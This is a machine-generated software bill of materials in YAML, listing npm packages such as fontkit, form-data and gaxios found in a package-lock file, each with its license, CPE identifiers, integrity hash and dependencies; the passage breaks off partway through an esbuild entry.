sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a2e20f1dd4ff167a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fontkit 2.0.4' title: fontkit 2.0.4 description: 'Package discovered: fontkit 2.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 83c2ace663a40ea8 name: fontkit version: 2.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fontkit@2.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz integrity: sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g== dependencies: '@swc/helpers': ^0.5.12 brotli: ^1.3.2 clone: ^2.1.2 dfa: ^1.2.0 fast-deep-equal: ^3.1.3 restructure: ^3.0.0 tiny-inflate: ^1.0.3 unicode-properties: ^1.4.0 unicode-trie: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0277ddadc8ca9fad ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: foreground-child 3.3.1' title: foreground-child 3.3.1 description: 'Package discovered: foreground-child 3.3.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: be5a9ebbd8259fbe name: foreground-child version: 3.3.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/foreground-child@3.3.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw== dependencies: cross-spawn: ^7.0.6 signal-exit: ^4.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f31639275e9af4b4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: form-data 2.5.5' title: form-data 2.5.5 description: 'Package discovered: form-data 2.5.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cccf1222c38fa883 name: form-data version: 2.5.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/form-data@2.5.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz integrity: sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A== dependencies: asynckit: ^0.4.0 combined-stream: ^1.0.8 es-set-tostringtag: ^2.1.0 hasown: ^2.0.2 mime-types: ^2.1.35 safe-buffer: ^5.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f04370c9bd4302d0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: form-data 4.0.5' title: form-data 4.0.5 description: 'Package discovered: form-data 4.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fb8802f2379acb63 name: form-data version: 4.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/form-data@4.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz integrity: sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w== dependencies: asynckit: ^0.4.0 combined-stream: ^1.0.8 es-set-tostringtag: ^2.1.0 hasown: ^2.0.2 mime-types: ^2.1.12 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 309869a00f00319d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: forwarded 0.2.0' title: forwarded 0.2.0 description: 'Package discovered: forwarded 0.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e972502f7a8ea944 name: forwarded version: 0.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/forwarded@0.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz integrity: sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f433c70fa1fc6314 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fraction.js 5.3.4' title: fraction.js 5.3.4 description: 'Package discovered: fraction.js 5.3.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f45608cb782e3ae1 name: fraction.js version: 5.3.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fraction.js@5.3.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz integrity: sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9a535c2456d85e31 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fresh 0.5.2' title: fresh 0.5.2 description: 'Package discovered: fresh 0.5.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7908a3419570e85d name: fresh version: 0.5.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/fresh@0.5.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz integrity: sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2b4f03d780920bbf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: fsevents 2.3.3' title: fsevents 2.3.3 description: 'Package discovered: fsevents 2.3.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 585a401b2834ec08 name: fsevents version: 2.3.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/fsevents@2.3.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz integrity: sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ed6c41b4eae5b77e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: function-bind 1.1.2' title: function-bind 1.1.2 description: 'Package discovered: function-bind 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a9db1e71931f56ac name: function-bind version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/function-bind@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz integrity: sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1567b7d3e95e72e5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: functional-red-black-tree 1.0.1' title: functional-red-black-tree 1.0.1 description: 'Package discovered: functional-red-black-tree 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 06c01b9cd08a3446 name: functional-red-black-tree version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/functional-red-black-tree@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz integrity: sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2d3340f07fdb7b3f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: gaxios 6.7.1' title: gaxios 6.7.1 description: 'Package discovered: gaxios 6.7.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9d900b217a57abee name: gaxios version: 6.7.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/gaxios@6.7.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz integrity: sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ== dependencies: extend: ^3.0.2 https-proxy-agent: ^7.0.1 is-stream: ^2.0.0 node-fetch: ^2.6.9 uuid: ^9.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 88029de581a160cb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: gcp-metadata 6.1.1' title: gcp-metadata 6.1.1 description: 'Package discovered: gcp-metadata 6.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: aa3886c02ba5c2c5 name: gcp-metadata version: 6.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/gcp-metadata@6.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz integrity: sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A== dependencies: gaxios: ^6.1.1 google-logging-utils: ^0.0.2 json-bigint: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c4a7ba3815d4fc91 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: get-caller-file 2.0.5' title: get-caller-file 2.0.5 description: 'Package discovered: get-caller-file 2.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: adc0dd4bf4f30c10 name: get-caller-file version: 2.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/get-caller-file@2.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz integrity: sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fcd2d596421aca4c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: get-intrinsic 1.3.0' title: get-intrinsic 1.3.0 description: 'Package discovered: get-intrinsic 1.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 338eac46e71d483e name: get-intrinsic version: 1.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/get-intrinsic@1.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz integrity: sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ== dependencies: call-bind-apply-helpers: ^1.0.2 es-define-property: ^1.0.1 es-errors: ^1.3.0 es-object-atoms: ^1.1.1 function-bind: ^1.1.2 get-proto: ^1.0.1 gopd: ^1.2.0 has-symbols: ^1.1.0 hasown: ^2.0.2 math-intrinsics: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 13f511e3eb23bc5c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: get-proto 1.0.1' title: get-proto 1.0.1 description: 'Package discovered: get-proto 1.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 64572c87855a75b1 name: get-proto version: 1.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/get-proto@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz integrity: sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g== dependencies: dunder-proto: ^1.0.1 es-object-atoms: ^1.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9565869711547f61 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /node_modules/@esbuild/darwin-arm64/bin/esbuild startLine: 0 message: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' title: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2 description: 'Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0b617a8d86aea060 name: github.com/evanw/esbuild version: v0.0.0-20240609211631-fc37c2fa9de2 type: go-module foundBy: go-module-binary-cataloger locations: - path: /node_modules/@esbuild/darwin-arm64/bin/esbuild accessPath: 